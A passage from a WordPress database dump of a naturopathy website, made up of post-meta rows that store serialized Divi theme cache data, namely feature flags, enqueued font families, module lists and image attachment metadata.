"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32297,1339,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32298,1339,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32299,643,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32300,643,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32294,794,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32295,1339,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32296,1339,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32290,1117,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32291,794,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32292,794,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32293,794,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32285,789,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32286,789,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32287,1117,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32288,1117,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32289,1117,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32277,1379,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32278,1379,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32279,1243,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32280,1243,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32281,1243,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32282,1243,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32283,789,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32284,789,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32274,650,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32275,1379,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32276,1379,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32273,650,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32266,1204,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32267,1191,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32268,1191,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32269,1191,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32270,1191,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32271,650,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32272,650,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32262,3,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32263,1204,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32264,1204,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32265,1204,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32259,3,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:4:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:10:\"et_pb_text\";}}'),(32260,3,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32261,3,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32258,424,'_et_builder_post_features_cache','a:2:{i:0;s:52:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"tb\":[],\"wpe\":[]}\";i:1;a:2:{s:20:\"attachment_url_to_id\";a:4:{s:67:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\";i:126;s:67:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\";i:122;s:67:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\";i:119;s:67:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\";i:127;}s:21:\"attachment_image_meta\";a:5:{s:69:\"attachment_image_meta_126_511850d8e5373a05c9bc9f030c005cba_responsive\";a:5:{s:2:\"id\";i:126;s:5:\"width\";s:2:\"81\";s:6:\"height\";s:3:\"140\";s:6:\"srcset\";s:71:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png 81w\";s:5:\"sizes\";s:29:\"(max-width: 81px) 100vw, 81px\";}s:69:\"attachment_image_meta_122_ad0e06279fea200f0c9c25b376fac25a_responsive\";a:5:{s:2:\"id\";i:122;s:5:\"width\";s:2:\"89\";s:6:\"height\";s:3:\"140\";s:6:\"srcset\";s:71:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png 89w\";s:5:\"sizes\";s:29:\"(max-width: 89px) 100vw, 89px\";}s:69:\"attachment_image_meta_119_060939c9da82ee0866f1e2a67d992d94_responsive\";a:5:{s:2:\"id\";i:119;s:5:\"width\";s:2:\"68\";s:6:\"height\";s:3:\"140\";s:6:\"srcset\";s:71:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png 68w\";s:5:\"sizes\";s:29:\"(max-width: 68px) 100vw, 68px\";}s:69:\"attachment_image_meta_127_66ed19037c672ca01fa24abfa7b8d1a0_responsive\";a:5:{s:2:\"id\";i:127;s:5:\"width\";s:2:\"70\";s:6:\"height\";s:3:\"140\";s:6:\"srcset\";s:71:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png 70w\";s:5:\"sizes\";s:29:\"(max-width: 70px) 100vw, 70px\";}s:69:\"attachment_image_meta_118_1c34b371881b87cbaf2fbe427241d25e_responsive\";a:5:{s:2:\"id\";i:118;s:5:\"width\";s:2:\"80\";s:6:\"height\";s:3:\"140\";s:6:\"srcset\";s:71:\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png 80w\";s:5:\"sizes\";s:29:\"(max-width: 80px) 100vw, 80px\";}}}}'),(32254,424,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:7:{i:0;s:12:\"divi/section\";i:1;s:8:\"divi/row\";i:2;s:11:\"divi/column\";i:3;s:10:\"divi/blurb\";i:4;s:11:\"divi/button\";i:5;s:10:\"divi/image\";i:6;s:9:\"divi/text\";}s:10:\"shortcodes\";a:0:{}}'),(32255,424,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32256,424,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:1:{i:0;b:1;}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:1:{i:0;i:1;}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:6:{i:0;s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";i:1;s:18:\"gcid-primary-color\";i:2;s:20:\"gcid-secondary-color\";i:3;s:18:\"gcid-heading-color\";i:4;s:15:\"gcid-body-color\";i:5;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32257,424,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:3:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";i:2;s:111:\"Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32250,764,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32251,764,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32252,764,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\